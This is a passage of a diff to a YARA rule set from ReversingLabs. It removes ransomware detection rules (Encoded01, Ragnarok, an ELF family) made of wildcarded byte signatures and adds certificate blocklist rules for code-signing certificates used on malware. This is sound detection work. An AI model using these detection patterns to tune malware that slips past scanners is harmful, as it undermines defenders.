-            E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C
-            89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ??
-            ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15
-            ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ??
-            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ??
-            4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F
-            85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9
-        }
-		$setup_environment = {
-            55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ??
-            ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ??
-            ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49
-            89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55
-            ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ??
-            ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ??
-            22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ??
-            ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ??
-            0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ??
-            ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83
-            C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48
-            89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03
-            7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89
-            EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5
-            B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3
-        }
-		$make_configuration = {
-            41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ??
-            ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00
-            ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
-            E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ??
-            83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48
-            63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5
-            48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14332-L14348"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $setup_environment ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $make_configuration )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Encoded01 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "923d987e-f888-5b6a-9ebd-ee1257124aed"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14350-L14366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Encoded01"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55
-            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ??
-            ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ??
-            ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ??
-            33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D
-            95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ??
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84
-        }
-		$find_files_p2 = {
-            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ??
-            75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ??
-            ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ??
-            ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33
-            D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ??
-            ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0
-            40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F
-        }
-		$enum_resources = {
-            55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33
-            C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ??
-            C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB
-            ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 ?? 80 7D ?? ?? 75 ??
-            8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F
-            5E 5B 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B
-            C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ??
-            50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0
-            ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ??
-            ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F
-            85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89
-            45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
-        }
-		$remote_connection_p2 = {
-            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74
-            ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A
-            58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ??
-            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D
-            ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ??
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50
-            8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06
-            E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03
-            C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D
-            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8
-        }
-		$encrypt_files = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
-            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D
-            ?? ?? 74
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f86fbd6f-1635-56d7-b390-e067f81b8705"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14368-L14384"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and pe.signatures [ i ] . serial == "3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ragnarok ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8fa1f434-2061-5131-9378-58c584eff447"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14386-L14402"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ragnarok"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8
-            ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B
-            5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59
-            EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C
-            ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95
-            ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53
-            57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ??
-            74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ??
-            ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ??
